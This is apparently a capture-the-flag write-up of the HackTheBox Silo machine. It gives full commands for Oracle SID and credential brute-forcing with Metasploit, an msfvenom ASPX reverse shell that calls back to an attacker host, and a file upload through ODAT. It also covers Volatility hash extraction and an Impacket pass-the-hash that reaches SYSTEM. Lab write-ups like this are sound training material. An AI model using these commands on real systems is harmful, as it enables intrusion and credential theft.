We covered Oracle Database Exploitation with Metasploit framework and oracle database attacking tool as part of Pwn with Metasploit from Hackthebox. This was part of HackTheBox Silo Machine.
Silo focuses mainly on leveraging Oracle to obtain a shell and escalate privileges. It was intended to be completed manually using various tools, however Oracle Database Attack Tool greatly simplifies the process, reducing the difficulty of the machine substantially.
Initial Reconnaissance and Enumeration
I started by running an Nmap scan on the target machine. This scan revealed two open ports:
- Port 80: Running an Internet Information Server (IIS), indicating a Windows Server. I found the default IIS page, but there were no immediate vulnerabilities.
- Port 1521: Running an Oracle database. This became my primary target.
Oracle Database Enumeration with Metasploit
My focus then shifted to enumerating the Oracle database using Metasploit.
First, I needed to find the SID (Service Identifier) of the Oracle database. I used the search TNS command in Metasploit to find relevant modules. I selected the auxiliary/admin/oracle/oracle_sid_brute module. After setting the target IP (set RHOSTS 10.10.10.56), I ran the module. It successfully identified “XE” as a SID, which I chose for the next steps.
Next, I attempted to brute-force the Oracle login credentials. I used the search oracle_login command to find a login brute-forcer module and selected auxiliary/scanner/oracle/oracle_login. I set the target IP (set RHOST 10.10.10.56) and the SID (set SID XE). Running the module was successful, revealing the default credentials: username “scott” and password “tiger“.
Generating and Uploading a Reverse Shell
With the credentials in hand, my plan was to upload a reverse shell.
I generated an ASPX payload using msfvenom because the target was a Windows server. The command I used was: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4545 -f aspx -o shell.aspx.
I then set up a listener in Metasploit by opening a new msfconsole instance. I used exploit/multi/handler and set the payload to windows/x64/meterpreter/reverse_tcp. I configured the listener’s IP (set LHOST <your_ip>) and port (set LPORT 4545) and then ran it.
To upload the shell, I used ODAT (Oracle Database Attacking Tool). After installing ODAT, I used the following command: python3 odat.py dbmsxslprocessor -s 10.10.10.56 -U scott -P tiger -d XE --putFile "/inetpub/wwwroot/shell.aspx" "/root/odat/shell.aspx" --isDBA. This successfully uploaded the shell.aspx file to the webroot.
Gaining Initial Access and Finding User Flag
I accessed the uploaded shell.aspx file via a web browser by navigating to http://10.10.10.56/shell.aspx. This triggered the reverse shell, and I established a Meterpreter session.
From the Meterpreter session, I dropped into a system shell using the shell command. I navigated to the Users directory, and after listing its contents, I found the user directory. Inside, I found and displayed the user flag using type user.txt. I also found a note.txt file, which contained a Dropbox link and a password hint for a memory dump file.
Privilege Escalation using Memory Dump and Volatility
The Dropbox link led me to a 1GB memory dump file. My next step was to analyze this memory dump using Volatility to extract the administrator hash.
I used the command volatility -f memory.dmp --profile=Win2012R2x64 hivelist to list the hives and identify the offsets for the SYSTEM and SAM hives. Then, I used volatility -f memory.dmp --profile=Win2012R2x64 hashdump -y <system_hive_offset> -s <sam_hive_offset> to extract the NTLM hash for the administrator account.
Gaining Root Access (Pass the Hash)
With the administrator’s NTLM hash, I used psexec.py from Impacket to perform a “pass the hash” attack. I navigated to the psexec.py directory (cd /usr/share/doc/python3-impacket/examples/) and executed the command: python3 psexec.py -hashes <administrator_ntlm_hash> administrator@10.10.10.56.
This successfully granted me a system shell as NT AUTHORITY\SYSTEM! I confirmed my privileges with whoami. Finally, I navigated to the Administrator’s desktop (cd C:\Users\Administrator\Desktop) and displayed the root flag using type root.txt.
I successfully gained root access to the Silo machine! 🎉
